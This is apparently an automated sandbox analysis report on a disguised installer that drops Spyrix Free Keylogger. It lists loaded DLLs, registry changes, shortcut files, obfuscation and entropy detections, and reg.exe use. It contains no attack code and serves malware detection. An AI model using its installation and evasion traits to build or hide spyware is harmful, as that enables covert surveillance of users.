Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH

Source: Spyrix Free Keylogger.lnk.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Gmail.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Window found: window name: TSelectLanguageForm

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Binary contains a suspicious time stamp

Source: [space]= .exe.6.dr

Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]

PE file contains sections with non-standard names

Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .d
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .adata
Source: is-67IFD.tmp.22.dr	Static PE information: section name: .rodata
Source: is-67IFD.tmp.22.dr	Static PE information: section name: .rotext
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name: .adata
Source: is-EO3DV.tmp.22.dr	Static PE information: section name: .didata
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /4
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /19
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /31
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /45
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /57
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /70
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /81
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /92
Source: ffws.exe.56.dr	Static PE information: section name: .rodata
Source: ffws.exe.56.dr	Static PE information: section name: .rotext

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_08EBFDB8 push esp; retf	7_2_08EBFDB9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008650DC push 00865161h; ret	56_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865B30 push 00865BB6h; ret	56_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086DEA3 push cs; ret	56_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008660D4 push 0086613Ch; ret	56_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D2D4 push cs; iretd	56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00872002 push 00000075h; retf	56_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00874401 push ecx; ret	56_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00869C0D push eax; ret	56_2_00869C8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086524C push 008652D7h; ret	56_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D586 push ebx; ret	56_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865188 push 00865230h; ret	56_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008675AC push 008675D9h; ret	56_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D3D6 push cs; iretd	56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865DFC push 00865E74h; ret	56_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00867550 push 0086759Ah; ret	56_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_007B16A4 push 007B17DEh; ret	56_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033CE001 push eax; ret	56_2_033CE108
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033CE001 push 033B4EC0h; ret	56_2_033CE5D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C310 push 0337C37Fh; ret	56_2_0337C377
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337F344 push 0337F3A1h; ret	56_2_0337F399
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C390 push 0337C3BCh; ret	56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C388 push 0337C3BCh; ret	56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03375BF8 push 03375C5Dh; ret	56_2_03375C55
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C3C8 push 0337C3F4h; ret	56_2_0337C3EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0338110C push ecx; mov dword ptr [esp], eax	56_2_03381111
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337D1FC push 0337D228h; ret	56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337D1FA push 0337D228h; ret	56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C1D0 push 0337C30Dh; ret	56_2_0337C305
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337573D push eax; ret	56_2_03375779
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03375F2C push 03375F58h; ret	56_2_03375F50

Source: [space]= .exe.6.dr	Static PE information: section name: .text entropy: 7.81759162350406
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.970560832581065
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.995359849273399
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.98989686324796
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.581553890924904
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.998441689187187
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .d entropy: 7.923610064617086
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.972249623981622
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.99458999281375
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.992015849394924
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.515192733866904
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.998936896615619
Source: is-719F1.tmp.22.dr	Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-719F1.tmp.22.dr	Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
